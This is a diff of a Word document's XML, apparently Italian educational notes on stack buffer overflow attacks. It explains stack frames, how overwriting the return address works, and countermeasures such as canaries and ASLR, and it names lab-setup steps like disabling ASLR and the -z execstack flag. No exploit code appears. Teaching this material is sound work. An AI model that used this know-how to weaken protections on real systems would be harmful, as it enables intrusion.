--- a/Documentation/Documentation.docx
+++ b/Documentation/Documentation.docx
@@ -477,6 +477,8 @@
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -527,21 +529,7 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>Creare u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">n esempio di </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>programma vulnerabile</w:t>
+        <w:t>Creare un esempio di programma vulnerabile</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -562,14 +550,7 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Controllare che l’ASLR sia </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>disabilitato</w:t>
+        <w:t>Controllare che l’ASLR sia disabilitato</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -818,11 +799,15 @@
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Referenze e Tutorial utili</w:t>
       </w:r>
@@ -2468,15 +2453,18 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Str</w:t>
-      </w:r>
-      <w:r>
+        <w:t>String growth</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>ing growth</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2500,34 +2488,50 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:ind w:left="708" w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Frame pointer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="708" w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve">Frame pointer </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:sym w:font="Wingdings" w:char="F0E0"/>
+        <w:tab/>
       </w:r>
     </w:p>
     <w:p>
@@ -2535,22 +2539,8 @@
         <w:ind w:left="708" w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="708" w:firstLine="708"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
@@ -2637,11 +2627,15 @@
         <w:ind w:left="708" w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:t xml:space="preserve">Stack pointer </w:t>
@@ -2649,12 +2643,16 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:sym w:font="Wingdings" w:char="F0E0"/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -2662,6 +2660,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Stack</w:t>
       </w:r>
@@ -2669,6 +2669,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -2676,6 +2678,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>growth</w:t>
       </w:r>
@@ -2686,6 +2690,8 @@
         <w:ind w:left="708" w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -2727,30 +2733,40 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Quando viene eseguite una funzione all’interno del programma verrà automaticamente allocato in memoria </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">un blocco di memoria </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">chiamato </w:t>
       </w:r>
@@ -2758,6 +2774,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>stack</w:t>
       </w:r>
@@ -2765,6 +2783,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> frame, composto da quattro regioni principali:</w:t>
       </w:r>
@@ -2977,19 +2997,25 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Copiare e trasferire dati all’interno della memoria è un task estremamente comune all’interno dei programmi. Ma dato che un programma necessita di allocare la memoria prima di poterci scrivere, spesso succede che lo spazio allocato non è sufficiente a contenere tutti i dati che si ha intenzione di memorizzare, questo è detto overflow. Alcuni linguaggi di programmazione gestiscono questo problema in maniera automatica (tipo Java) mentre altri affidano il compito al programmatore (C e C++). Questo potrebbe portare a dei seri rischi di compromissione della sicurezza del sistema su cui si sta lavorando.</w:t>
       </w:r>
@@ -2999,11 +3025,15 @@
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">L’attacco di Buffer Overflow punta appunto su questa debolezza di alcuni linguaggi di programmazione, andando a memorizzare stringhe di lunghezza superiore alla dimensione consentita dal buffer, andando a sovrascrivere valori sensibili presenti all’interno dello </w:t>
       </w:r>
@@ -3011,6 +3041,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>stack</w:t>
       </w:r>
@@ -3018,18 +3050,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">come ad </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">esempio dovesse essere sovrascritto il Return </w:t>
       </w:r>
@@ -3037,6 +3075,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Address</w:t>
       </w:r>
@@ -3044,12 +3084,16 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> la funzione, una volta eseguita, non tornerà all’indirizzo di memoria predestinato</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> bensì ad uno nuovo.</w:t>
       </w:r>
@@ -3060,11 +3104,15 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Un attacco di tipo Buffer Overflow potrebbe quindi portare a far terminare un certo programma o ancora peggio prendere il controllo del programma o addirittura sistema stesso da parte dell’attaccante.</w:t>
       </w:r>
@@ -3075,13 +3123,15 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -3378,6 +3428,13 @@
         </w:rPr>
         <w:t>alcuni linguaggi di programmazione implementano dei controlli di sicurezza contro questo tipo di attacco. Ad esempio, per quanto riguarda gli attacchi di tipo BO, Python e Java forniscono un controllo automatico dei limiti del buffer, in modo tale da evitare qualsiasi tipo di pericolo di BO senza che lo sviluppatore se ne debba occupare personalmente</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3544,15 +3601,17 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>, ovvero</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> un valore random</w:t>
-      </w:r>
+        <w:t xml:space="preserve">, ovvero un valore random generato in fase di inizializzazione del programma e inserito dal compilatore a compile time nell’allocazione di memoria sopra al buffer e dopo il BP. Il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Canary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3560,20 +3619,13 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">generato in fase di inizializzazione del programma e inserito dal compilatore a compile time nell’allocazione di memoria sopra al buffer e dopo il BP. Il </w:t>
-      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>Canary</w:t>
+        <w:t>value</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -3581,22 +3633,6 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>value</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
         <w:t xml:space="preserve"> viene controllato all’uscita della funzione, e deve essere uguale a quello inizializzato dal sistema operativo, altrimenti siamo in presenza di un buffer overflow. Se il controllo fallisce, il programma viene terminato con un messaggio di errore.</w:t>
       </w:r>
     </w:p>
@@ -3609,8 +3645,6 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3853,7 +3887,16 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">prima dell’esecuzione di un programma, il sistema operativo ha il compito di preparare l’ambiente necessario e il relativo spazio in memoria. Una contromisura molto comune a livello di OS è </w:t>
+        <w:t>prima dell’esecuzione di un progra</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">mma, il sistema operativo ha il compito di preparare l’ambiente necessario e il relativo spazio in memoria. Una contromisura molto comune a livello di OS è </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4009,14 +4052,12 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -5343,16 +5384,17 @@
         <w:pStyle w:val="Standard"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
+          <w:numId w:val="16"/>
         </w:numPr>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve">-z </w:t>
@@ -5360,7 +5402,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:b/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>execstack</w:t>
@@ -5368,20 +5410,15 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Di default gli </w:t>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: Di default gli </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>stacks</w:t>
@@ -5389,6 +5426,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve"> non sono eseguibili per evitare iniezione di codice malizioso; questa contromisura è chiama non-</w:t>
@@ -5396,6 +5434,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>executable</w:t>
@@ -5403,6 +5442,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -5410,6 +5450,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>stack</w:t>
@@ -5417,6 +5458,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
